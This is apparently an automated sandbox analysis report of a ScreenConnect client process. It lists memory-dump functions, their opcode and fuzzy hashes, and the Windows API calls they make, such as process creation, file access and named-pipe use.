Instruction ID: 3d82cd38aa2bca81d6e44dd731056c4d062ac0e6a66419340ce6689982311dc4
Opcode Fuzzy Hash: 85402dbbd25669dba1d575505f51a68c0f45b1e92a1082b171d45b38490968b3
Instruction Fuzzy Hash: 8F01F7311083009AEB214AADED84767FF98EF453A4F08C569ED480B286C27A9849C6B1

Function 01837FF8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115083b2171ce000cfcae63980626ce039cc561d94d0e2b0b2e331cd47adfb1f
Instruction ID: 12ca4f1557f2688e79428bc2cba7b91b45050361a88dcecf95bc87d3988c1b08
Opcode Fuzzy Hash: 115083b2171ce000cfcae63980626ce039cc561d94d0e2b0b2e331cd47adfb1f
Instruction Fuzzy Hash: 0101AD7620D3408FD355CF28A802796BFE1AB95710F09886EE5C9CB3C1EA72AD45CB55

Function 01838168 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b60b60d9c01c64e6e73e468942b4ca59bd1b1ff5dadbe16c785d313779ca87f5
Instruction ID: bcb2ee92f71211400e3d6a05f1c7ab1dc1e46cdd1a2159e3d7e8e428119a1837
Opcode Fuzzy Hash: b60b60d9c01c64e6e73e468942b4ca59bd1b1ff5dadbe16c785d313779ca87f5
Instruction Fuzzy Hash: C5F05836B082046BD728CAAAA501A9BBBDECBC5220B14847FE54DC3680E931A54087A8

Function 0179D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962632094.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_179d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48f4fd795e08a7c7035e647225cb8c1a3b0e3afd4d313dfc74daaff92f5eb7d8
Instruction ID: 8a3ac32d96b18d505f5e3310c3bffafe3bb88047657846623ddad0e6abd68318
Opcode Fuzzy Hash: 48f4fd795e08a7c7035e647225cb8c1a3b0e3afd4d313dfc74daaff92f5eb7d8
Instruction Fuzzy Hash: B8F06271404344AEEB218E1ADCC4B62FFA8EB45664F18C55AED484E296C27A9845CAB1

Function 01835F68 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce08aca9b2e6e4abcd80cf7225b0a6aeb15740ddaf3516c040c9997df86e1d3
Instruction ID: c5559c3c5b7f652382656d6a6439a21c38d0822f698a7906a94ca192e0bd1f99
Opcode Fuzzy Hash: 4ce08aca9b2e6e4abcd80cf7225b0a6aeb15740ddaf3516c040c9997df86e1d3
Instruction Fuzzy Hash: 62F0E562B15A926FDB12811C9C066527FDA4B8A365F2E86B2F529CF3C3F610DD0147C2

Function 01831414 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 379b8149d38be8377df456143694524de526ef758d94608ce7ed2283793ffabb
Instruction ID: 28a5e3010ad9f6bdcd74b4dec679171cee08b3d91c624722970f77ba96ea08d7
Opcode Fuzzy Hash: 379b8149d38be8377df456143694524de526ef758d94608ce7ed2283793ffabb
Instruction Fuzzy Hash: 9BF0247250C3804FD312C768B811399BFA1EBD2310B4946EAD085CF2A6E659EA49CB91

Function 01831DA1 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20720dfebac9465e69cc1b25b6a7cbee8646197fbe444eead501ba7220b12f5
Instruction ID: fe0455aa4058815478bf00edc67f5fe5564252ade8a4173747e91d4f3749107c
Opcode Fuzzy Hash: a20720dfebac9465e69cc1b25b6a7cbee8646197fbe444eead501ba7220b12f5
Instruction Fuzzy Hash: AEF0A0353023046BD7126B78A85D62A7FA6EBC6632B498126E616CB3C5CE708C0587A4

Function 01830838 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a02b89b73e6bc8156b6364d4957514cbc693fb308ec5cb53fbf9a2c3bffd1d
Instruction ID: 252756e43ae32f2be26ee9b753c59fa9b8c2a33fab0f2abb55af6b1e0b8f59e5
Opcode Fuzzy Hash: 48a02b89b73e6bc8156b6364d4957514cbc693fb308ec5cb53fbf9a2c3bffd1d
Instruction Fuzzy Hash: 5AF0A730909308EFC705CF78DC01559FBB4EB81305F4501AAD549D7251D6309F55DB91

Function 01836EF2 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9055c1ef824b3dd0a6bf1cb784f872d02ddb6244566db09fb54a9ed62dd2c772
Instruction ID: dfd17c4473471d8560b65376085bc3ffb3ffbaf918a3a5e660e0f0814053a66a
Opcode Fuzzy Hash: 9055c1ef824b3dd0a6bf1cb784f872d02ddb6244566db09fb54a9ed62dd2c772
Instruction Fuzzy Hash: B3E0D8323543147BDB151AAE788D62BBEDAEBC9722B64403DF30DC7350DE619D0547A1

Function 018312B0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bdeffaec24cc47660e109f3c447d993b0c2f8db827d9cb54a20292c402ee713
Instruction ID: dc3b89708405c36bfa08ca42f8f36f42d1e8d7941383113bae1df90593e5859d
Opcode Fuzzy Hash: 1bdeffaec24cc47660e109f3c447d993b0c2f8db827d9cb54a20292c402ee713
Instruction Fuzzy Hash: 75F0A0313007008B8712D66DA80456EB7AEEBC8B61748942DDC1AC7304DA65ED058BD0

Function 01838167 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36ef70655521fc2492f31a64cd87f489f3e4729b00f8bceeb89c062bac038e9c
Instruction ID: c8f6807afbc092b0a35f4772429caa20d4afd9a5c73065b160213e7a003e7665
Opcode Fuzzy Hash: 36ef70655521fc2492f31a64cd87f489f3e4729b00f8bceeb89c062bac038e9c
Instruction Fuzzy Hash: 38E04F76A182146FD768CABAA901AAFABEE8BD5220B14C57FE50DD3240E93095418768

Function 01836EF8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51a22647743bb0775086b55aab9bee50df82594919b38056d807bdd999365029
Instruction ID: 4aa7a277fae509f0841502aca87484be94bee203d31eff04a5e3280de58814e9
Opcode Fuzzy Hash: 51a22647743bb0775086b55aab9bee50df82594919b38056d807bdd999365029
Instruction Fuzzy Hash: E9E02631310314A78B152AAE748C12EBEDBFBC8632394403DF20EC3300DE719C0543A1

Function 0183181A Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55002a026814cc9592dd0d2e079cfd138d5782b7c429e83b0b720a89b4deff87
Instruction ID: ade214de5a2652996150e35c40dd38e3a7f5f79a86db2affded512e509c008b4
Opcode Fuzzy Hash: 55002a026814cc9592dd0d2e079cfd138d5782b7c429e83b0b720a89b4deff87
Instruction Fuzzy Hash: FAE09275B057409FC7265730D81C6587FA6FF86762F49809AE51A87295CB369C00CF86

Function 01831DF8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e658d72585ac4adade2c3afc1fdaac0a48cb48106ea8c9aeef50c75a63b26b4
Instruction ID: 8394750696c240ccd6a36cff7b2a4c846d4df17c9dc43877a91e47091ab4ccff
Opcode Fuzzy Hash: 2e658d72585ac4adade2c3afc1fdaac0a48cb48106ea8c9aeef50c75a63b26b4
Instruction Fuzzy Hash: C0E02BB050634CAFC701DF74EC46769BBB8DB02315F014099E408C7241D6701E049B42

Function 01831DB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04636cb01511873d24b8aca1adb630ba6832191e5bbc7ac71ee2b5b01f84bc64
Instruction ID: ba430d9b72b9d0fc8a8fa53f99b20ad55c6e9bc03c30072fb60bd8adb318670f
Opcode Fuzzy Hash: 04636cb01511873d24b8aca1adb630ba6832191e5bbc7ac71ee2b5b01f84bc64
Instruction Fuzzy Hash: C2E08C3A3011187B8B156A7DE40C46EBBAAEBC9272350C126E90AC3388CE708C4287A0

Function 018313D1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19cd6ac80b0d6de3cf5b4c6daf82c66f4b753de9c7c33c2b57c8d1b535f01a06
Instruction ID: d40897840c80ff8c9a4fd24c2d8167baee90aba55b9c8b11f90f64d088169dd6
Opcode Fuzzy Hash: 19cd6ac80b0d6de3cf5b4c6daf82c66f4b753de9c7c33c2b57c8d1b535f01a06
Instruction Fuzzy Hash: DFE0D8311087410FC716D62CF80079DBBE2EBC1310F0559E9D0448B2A6D654AD488791

Function 01831310 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ef457f055772fd5b5b79db2ee3353ac60b7010ac5c52c31b65512e717ced95b
Instruction ID: e048067d336a36e66bdf2fc3df2a35cd145ad67d532d1ecbda351a000bc253b8
Opcode Fuzzy Hash: 0ef457f055772fd5b5b79db2ee3353ac60b7010ac5c52c31b65512e717ced95b
Instruction Fuzzy Hash: 38E0E670D0110D6FC780DFBC8E4565EBBF4FB48704F1485A9991DE7241E63596128FD1

Function 01837FB8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42190ab4e7d8f4e15db2442b9df30c8864cc4caaa3e2f243a29d075401c9028c
Instruction ID: b392a8c0bf47458c0d5ff15a1d86c5873eb7dae3d7295af0af37c7f6be819040
Opcode Fuzzy Hash: 42190ab4e7d8f4e15db2442b9df30c8864cc4caaa3e2f243a29d075401c9028c
Instruction Fuzzy Hash: 68E0ED344597559FC345DB249D06946FBF0AB05600F05C9AED888CB296D2309955DB93

Function 01838120 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d414f8bbadc0ae2399cc02ac5d48bd5dffeee3f1fb5cb953e7ffa49487ac14
Instruction ID: dfb67c47c6d4697f2bcd38f50181b24e0eb746227eb6db5c5366fb62352db864
Opcode Fuzzy Hash: e4d414f8bbadc0ae2399cc02ac5d48bd5dffeee3f1fb5cb953e7ffa49487ac14
Instruction Fuzzy Hash: 08E08C71854201AFC740AFA4E944386BBE4AB54210F448E6DE889C3200E234AD85CB42

Function 01838158 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c7e7e8846946da097fc470137889e21fbf8cd4fe482a55332253c3a3c42337
Instruction ID: 22cd88d9a14214d4ffe439142d5e7947740d78396d2473f8c23a7937a01061b8
Opcode Fuzzy Hash: 52c7e7e8846946da097fc470137889e21fbf8cd4fe482a55332253c3a3c42337
Instruction Fuzzy Hash: 99E0C2704487409FC751CF20E844249BFF0AB42711F0A449EE488D7281E370AC45CF42

Function 01830848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615fadabeb864b70127890ac5c46f0143d91eb83011b9ea2a8024be3ca2d7c1d
Instruction ID: 4f504b3ee90ef4873884c8dddcbbef41c6a4ec013d111c7de9c5b552c9d36633
Opcode Fuzzy Hash: 615fadabeb864b70127890ac5c46f0143d91eb83011b9ea2a8024be3ca2d7c1d
Instruction Fuzzy Hash: A1D01730A01208EF8B40DFB8E90155DBBB9EB84201B5046ACD808D3204EA316E049B81

Function 01831E08 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1962897737.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1830000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56a8a8b06344ea4050a139a8cf1f6581d1a75282c91c9d4e063f37803506a902
Instruction ID: 290985e2e6035149e85be137aff7a6992d4006e42eaa2f39196003aea5648965
Opcode Fuzzy Hash: 56a8a8b06344ea4050a139a8cf1f6581d1a75282c91c9d4e063f37803506a902
Instruction Fuzzy Hash: D8D05EB0A0620CEFCB40DFB8E94565DFBB9EB48310B1091A9E80CD7300EA716F049B80

Analysis Process: ScreenConnect.ClientService.exePID: 7476, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.4%
Total number of Nodes:	78
Total number of Limit Nodes:	7

Executed Functions

Function 01CE4C62 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlGetVersion.NTDLL(0000009C), ref: 01CE4DBE

Strings

$;#, xrefs: 01CE4D5C
$;#, xrefs: 01CE4E1D
`Qkq, xrefs: 01CE4C86
`Qkq, xrefs: 01CE4DEB

Memory Dump Source

Source File: 0000000B.00000002.2961462272.0000000001CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ce0000_ScreenConnect.jbxd

Similarity

API ID: Version
String ID: $;#$$;#$`Qkq$`Qkq
API String ID: 1889659487-2813954190
Opcode ID: a361a001a8bc04401c3bdae0f9873229a214ea1a0b6b7c4eb9a1078760f1ba71
Instruction ID: bceea6c1095f253f0f64edaa25fdd0c453aa4ffcd92c27b1d540ac81e6e191e4
Opcode Fuzzy Hash: a361a001a8bc04401c3bdae0f9873229a214ea1a0b6b7c4eb9a1078760f1ba71
Instruction Fuzzy Hash: 8B41BE71A00319DFDB649F69C809BAEBBB5FB44300F1085E9D509E7280DB759E48CF92

Function 05950360 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0595042F

Strings

$;#, xrefs: 0595038A

Memory Dump Source

Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd

Similarity

API ID: CreateProcessUser
String ID: $;#
API String ID: 2217836671-1209804496
Opcode ID: 8127383408e35cdfe1671a43f94ddeeeb8deed0196c67c10b0da42849965e52d
Instruction ID: b23657a2e7a47b6056afc9e09dc1d07265f1ebf8c0472b5dac4a7d8abc0e4358
Opcode Fuzzy Hash: 8127383408e35cdfe1671a43f94ddeeeb8deed0196c67c10b0da42849965e52d
Instruction Fuzzy Hash: 10410276900209DFCB11CFA9C884ADEBBF5FF48320F14852AE918A7250D775A965CF90

Function 0595D734 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 119
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0595D85D

Strings

$;#, xrefs: 0595D765
4Lkq, xrefs: 0595D809
$;#, xrefs: 0595D785

Memory Dump Source

Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID: $;#$$;#$4Lkq
API String ID: 823142352-364487146
Opcode ID: 1e7d17b840fd86fe2d47ce26878b1326514defd4103e5381bef2b955bc7e51c3
Instruction ID: 83ded59de09bff89363e28d4a68d2eec581197bee6517f9f8aa9bc75ca94287d
Opcode Fuzzy Hash: 1e7d17b840fd86fe2d47ce26878b1326514defd4103e5381bef2b955bc7e51c3
Instruction Fuzzy Hash: 535186B0D003499FDB10CFA9C884B9EBBF2FB48310F248169E808AB351D7B99954CF81

Function 0595BBC8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 119
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0595D85D

Strings

$;#, xrefs: 0595D765
4Lkq, xrefs: 0595D809
$;#, xrefs: 0595D785

Memory Dump Source

Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID: $;#$$;#$4Lkq
API String ID: 823142352-364487146
Opcode ID: d4bc550a901dd0c14f7a40490458bcbeaea3f58dd8245f748b43fc423cc6f050
Instruction ID: af345986fb48b1242e4636089c338455d51ac06409911434cf14d9de25fb5b2c
Opcode Fuzzy Hash: d4bc550a901dd0c14f7a40490458bcbeaea3f58dd8245f748b43fc423cc6f050
Instruction Fuzzy Hash: 8B5166B0D003599FDB10CFA9C884B9EBBF2FB48314F248169E809AB355D7B99954CF81

Function 05D233E8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$;#, xrefs: 05D2354A

Memory Dump Source

Source File: 0000000B.00000002.2978513912.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5d20000_ScreenConnect.jbxd

Similarity

API ID:
String ID: $;#
API String ID: 0-1209804496
Opcode ID: edfec01c9c0de93f22939ab4a6b4ecb728157eff22aa3a3b598b279d453ce672
Instruction ID: 511bc383a468d3197c8a6b247a39de69ef86e47a04d90920782d74f6d868b784
Opcode Fuzzy Hash: edfec01c9c0de93f22939ab4a6b4ecb728157eff22aa3a3b598b279d453ce672
Instruction Fuzzy Hash: 2F519071A006158FCB24CFA9D8806AEFBF1FF88314F14896ED45AD7650D734E945CBA1

Function 05950358 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0595042F

Strings

$;#, xrefs: 0595038A

Memory Dump Source

Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd

Similarity

API ID: CreateProcessUser
String ID: $;#
API String ID: 2217836671-1209804496
Opcode ID: b7c58879ee0c8b2f725a1fef8d4ba57ca03515bfe5976d44e567f387db84a74f
Instruction ID: 85b47363bc376420501afdb444abb4507769bbc93997aac6270374cdd8ca0eb4
Opcode Fuzzy Hash: b7c58879ee0c8b2f725a1fef8d4ba57ca03515bfe5976d44e567f387db84a74f
Instruction Fuzzy Hash: FA411272900209DFCF11CFA9C884ADEBBF5FF48320F14852AE918A7250D775A965CF90

Function 05950774 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 05950A38

Strings

$;#, xrefs: 059509E2

Memory Dump Source

Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd

Similarity

API ID: ConnectNamedPipe
String ID: $;#
API String ID: 2191148154-1209804496
Opcode ID: d204f61f99a7678dfd37bb2245f30b9327971144628fb418e3d8e32f7c7e1268
Instruction ID: bef196a6504595d82148475603f7de882b106bce49e35b1eb381b272818f4355
Opcode Fuzzy Hash: d204f61f99a7678dfd37bb2245f30b9327971144628fb418e3d8e32f7c7e1268
Instruction Fuzzy Hash: DB2123B1D142589FCB24CF99C588B9EBBF5BF48310F148069E809BB350CB74A845CFA0

Function 059509B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 05950A38

Strings

$;#, xrefs: 059509E2

Memory Dump Source

Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd

Similarity

API ID: ConnectNamedPipe
String ID: $;#
API String ID: 2191148154-1209804496
Opcode ID: 13bbc62fe4818dfe9e84891eec2dec1a91275a63db6ca2ca0adf37ed0c396e32
Instruction ID: b3fcf5ae161641884d340ef9feb45f97d2c889c419633e280dfbd0e7bf5fab2e
Opcode Fuzzy Hash: 13bbc62fe4818dfe9e84891eec2dec1a91275a63db6ca2ca0adf37ed0c396e32
Instruction Fuzzy Hash: 832120B1D142589FCB24CFAAC598B9EBBF5BF48310F148469E849AB350CB749845CFA0

Function 05D2271C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05D2359D

Strings

$;#, xrefs: 05D2354A

Memory Dump Source

Source File: 0000000B.00000002.2978513912.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5d20000_ScreenConnect.jbxd

Similarity

API ID: EnumProcesses
String ID: $;#
API String ID: 84517404-1209804496
Opcode ID: b461e53957b4a5c1259b0eb23d0e2000d824ad2ff0044a6c9e3e942b1f772eac
Instruction ID: 78db8fb3919b24c783755f6104d0f9bfaa74cf7000caaa91846486c872312855
Opcode Fuzzy Hash: b461e53957b4a5c1259b0eb23d0e2000d824ad2ff0044a6c9e3e942b1f772eac
Instruction Fuzzy Hash: F82125B59042199FDB10CF9AC885BDEFBF4FB48314F10842EE519A7340C338A945CBA5

Function 05952541 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitNamedPipeW.KERNEL32(00000000), ref: 059525AF

Strings

$;#, xrefs: 05952567

Memory Dump Source

Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd

Similarity

API ID: NamedPipeWait
String ID: $;#
API String ID: 3146367894-1209804496
Opcode ID: dda733e9e858c68cc5b7486e2eb937579a9881a4ec502c6b53ff12f62faebc1d
Instruction ID: f1e3b83e1b3a3ffee7ae3b7f72907adab1e4a29873f00ec5a1e664d325c9c1a4
Opcode Fuzzy Hash: dda733e9e858c68cc5b7486e2eb937579a9881a4ec502c6b53ff12f62faebc1d
Instruction Fuzzy Hash: 142124B68003498FCB10CF9AC844BDEBBF5FB48324F14842DD859A7240C779A545CFA1

Function 05952548 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitNamedPipeW.KERNEL32(00000000), ref: 059525AF

Strings

$;#, xrefs: 05952567

Memory Dump Source

Source File: 0000000B.00000002.2977094703.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5950000_ScreenConnect.jbxd

Similarity

API ID: NamedPipeWait
String ID: $;#
API String ID: 3146367894-1209804496
Opcode ID: cfc270efae657595c97d8734c0246cc0fa8b2cbcd739d703d2f2274d36ea8c0e
Instruction ID: ea12f84a789ac98de6df2dce6b961a12361dbe34386acf6c48652fc493a5fa84
Opcode Fuzzy Hash: cfc270efae657595c97d8734c0246cc0fa8b2cbcd739d703d2f2274d36ea8c0e
Instruction Fuzzy Hash: 5921F2B68002498FCB24CF9AC444BEEBBF5FB48324F14846ED859A7240D779A545CFA1

Function 05D22710 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D2367E

Strings

$;#, xrefs: 05D2363F

Memory Dump Source

Source File: 0000000B.00000002.2978513912.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5d20000_ScreenConnect.jbxd

Similarity

API ID: ProcessSession
String ID: $;#
API String ID: 3779259828-1209804496
Opcode ID: 330c461167a770f3c2f76c8f0fdb34721af6423dd945069d57d90ccb03d95867
Instruction ID: 79aee57cd370ad0bd7801d3ffd6c62d96813b8efd046d3c0bc9f6eb3a5ea445a
